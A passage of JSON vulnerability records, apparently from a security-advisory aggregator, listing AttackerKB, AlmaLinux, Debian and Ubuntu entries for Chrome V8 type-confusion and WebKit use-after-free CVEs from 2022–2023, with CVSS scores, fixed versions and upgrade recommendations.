"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-1364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2023-10-07T00:00:00", "id": "AKB:FF8776A0-8F09-4620-A059-9AA63732C37D", "href": "https://attackerkb.com/topics/2g85mcptOV/cve-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:33:23", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-4262", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2023-10-08T00:00:00", "id": "AKB:1F95080F-4C69-401E-9659-D6FBB9B68458", "href": "https://attackerkb.com/topics/L9bgkdtjHF/cve-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:38:37", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2023-10-07T00:00:00", "id": "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "href": "https://attackerkb.com/topics/Jr4SM2pfMz/cve-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "almalinux": [{"lastseen": "2023-11-17T11:35:32", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "almalinux", "title": "Important: 
webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T08:29:39", "id": "ALSA-2023:1918", "href": "https://errata.almalinux.org/9/ALSA-2023-1918.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:25:30", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-20T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-21T08:37:18", "id": "ALSA-2023:1919", "href": "https://errata.almalinux.org/8/ALSA-2023-1919.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-17T11:35:32", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the AlmaLinux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-09T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-11T21:21:06", "id": "ALSA-2023:2653", "href": "https://errata.almalinux.org/9/ALSA-2023-2653.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T20:25:30", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* WebKitGTK: Regression of CVE-2023-28205 fixes in the AlmaLinux (CVE-2023-2203)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-16T00:00:00", "type": "almalinux", "title": "Important: webkit2gtk3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-19T22:01:27", "id": "ALSA-2023:3108", "href": "https://errata.almalinux.org/8/ALSA-2023-3108.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-11-30T18:42:13", 
"description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5390-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 16, 2023 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2023-2033\nDebian Bug : 1034406\n\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 112.0.5615.121-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-16T17:38:41", "type": "debian", "title": "[SECURITY] [DSA 5390-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-16T17:38:41", "id": "DEBIAN:DSA-5390-1:E9996", "href": "https://lists.debian.org/debian-security-announce/2023/msg00080.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T09:59:14", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5263-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 29, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-3723\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 107.0.5304.87-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-29T20:36:13", "type": "debian", "title": "[SECURITY] [DSA 5263-1] chromium security update", "bulletinFamily": "unix", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-29T20:36:13", "id": "DEBIAN:DSA-5263-1:A8269", "href": "https://lists.debian.org/debian-security-announce/2022/msg00233.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T10:08:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5295-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nDecember 04, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-4262\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 108.0.5359.94-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-04T20:33:03", "type": "debian", "title": "[SECURITY] [DSA 5295-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-04T20:33:03", "id": "DEBIAN:DSA-5295-1:10985", "href": "https://lists.debian.org/debian-security-announce/2022/msg00266.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:36:24", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5121-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nApril 16, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-1364\n\nA security issue was discovered in Chromium, which could result in the\nexecution of arbitrary code.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 100.0.4896.127-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian 
Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-16T18:29:01", "type": "debian", "title": "[SECURITY] [DSA 5121-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-04-16T18:29:01", "id": "DEBIAN:DSA-5121-1:3B3A1", "href": "https://lists.debian.org/debian-security-announce/2022/msg00089.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T15:36:57", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5110-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 28, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-1096\n\nA security issue was discovered in Chromium, which could result in 
the\nexecution of arbitrary code if a malicious website is visited.\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 99.0.4844.84-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T07:03:21", "type": "debian", "title": "[SECURITY] [DSA 5110-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T07:03:21", "id": "DEBIAN:DSA-5110-1:CD232", "href": "https://lists.debian.org/debian-security-announce/2022/msg00078.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-11-09T13:23:47", "description": 
"A use after free issue was addressed with improved memory management. This\nissue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1\nand iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web\ncontent may lead to arbitrary code execution. Apple is aware of a report\nthat this issue may have been actively exploited.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "ubuntucve", "title": "CVE-2023-28205", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-10T00:00:00", "id": "UB:CVE-2023-28205", "href": "https://ubuntu.com/security/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T13:19:28", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a\nremote attacker to 
potentially exploit heap corruption via a crafted HTML\npage. (Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T00:00:00", "type": "ubuntucve", "title": "CVE-2023-2033", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-14T00:00:00", "id": "UB:CVE-2023-2033", "href": "https://ubuntu.com/security/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:31:51", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage. 
(Chromium security severity: High)\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-3723", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2022-11-01T00:00:00", "id": "UB:CVE-2022-3723", "href": "https://ubuntu.com/security/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T13:38:00", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu 
